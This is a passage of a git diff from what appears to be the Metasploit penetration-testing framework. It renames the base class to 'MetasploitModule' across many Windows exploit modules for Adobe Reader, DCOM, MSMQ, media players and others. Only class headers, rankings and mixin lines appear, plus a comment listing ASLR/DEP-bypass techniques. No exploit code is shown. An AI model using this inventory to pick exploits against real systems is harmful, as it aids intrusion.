Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 6e66961670..3a30a85b77 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index c96e02efd9..6f70408261 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 7c1644a853..b2850c5420 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 3a1fb0408b..2cd0def19c 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index dd935ca56b..a6ec6d8d85 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 6f5aa83335..2af7cccba2 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 9f479be312..02656d4b0a 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 609af5543f..de613c1c99 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index 07697ef91d..7839770d97 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 1ac3b2d0fd..8aa7292ccb 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index acbae74556..8c96c8ebe2 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb index d053f2fdad..a75d439009 100644 --- a/modules/exploits/windows/emc/replication_manager_exec.rb +++ b/modules/exploits/windows/emc/replication_manager_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index d356673194..3adf2f2f65 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index b5b5df41ca..3b4ad817a3 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index d3ba10d458..8fb6d3e430 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index d0e2e16721..e9df444bb5 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb index 81a9d67736..7e7812e50e 100644 --- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb +++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index b53d2e1068..7c625798f0 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 63bc9c8fcf..8e05a4b086 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 6af35d6482..b552117821 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 57d50e1f20..6bc77221ec 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index f1435ffe44..5e519cd03f 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index e73645b2ee..0ad971fa75 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index d67d68d24f..cb4a602a6f 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 5e4d7de6d3..0f7e4e0a76 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f47602744f..9cd953b2de 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2a1bd72bf5..d7a76340f7 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 3abbfeaee9..c11e6b9043 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 49bb5b8e07..30aa1cec60 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index b5658a0430..369443f74e 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -17,7 +17,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index fd420091a1..bcb30ff04d 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index caa942dc5e..0a3e8b3a95 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index a64fa5f6ba..265eb15565 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 03dda02143..307fefe4e6 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb index 396176bf0d..9321d5dbc4 100644 --- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 4d85c1fae8..0862629e6e 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index d807274f3f..b64b1dba03 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 53c044328a..fd2dddf5f8 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -29,7 +29,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index ed6dd402c0..e656115c4d 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 3cb025d7c9..f52c94d008 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index e2ef03ffb9..f8f8cb9c45 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_coder_m3u.rb b/modules/exploits/windows/fileformat/audio_coder_m3u.rb index 677b09c960..b46808db8f 100644 --- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb +++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index c59964b672..74d8300822 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 098c82121b..43aa6646dc 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 2d824873e9..7310aa459c 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index cf3be4cdb6..41f0c09caa 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index dd284bb9b9..35d8e5431d 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index 16f16399e7..27865cb896 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -5,7 +5,7 @@ require "msf/core" -class Metasploit4 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = NormalRanking diff --git a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb index 9cce4f1ed1..44b52c9745 100644 --- a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb +++ b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index e8e7b6feb9..1496c6bb45 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index eb1382c2c9..4d501e88fc 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bsplayer_m3u.rb b/modules/exploits/windows/fileformat/bsplayer_m3u.rb index ac074a89b7..a651c57417 100644 --- a/modules/exploits/windows/fileformat/bsplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/bsplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index a596d254fc..9fd6e8977a 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index b9960e6c1d..7b13a94448 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index 2eddd04730..23a4802477 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index ead6de182e..6a250a4be3 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index fd03303457..dc224d9809 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index 672dd21363..6097c8fb34 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb +++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 1e45c2bad9..50aaa3d7ed 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index f27d29a44c..4cdb568852 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include 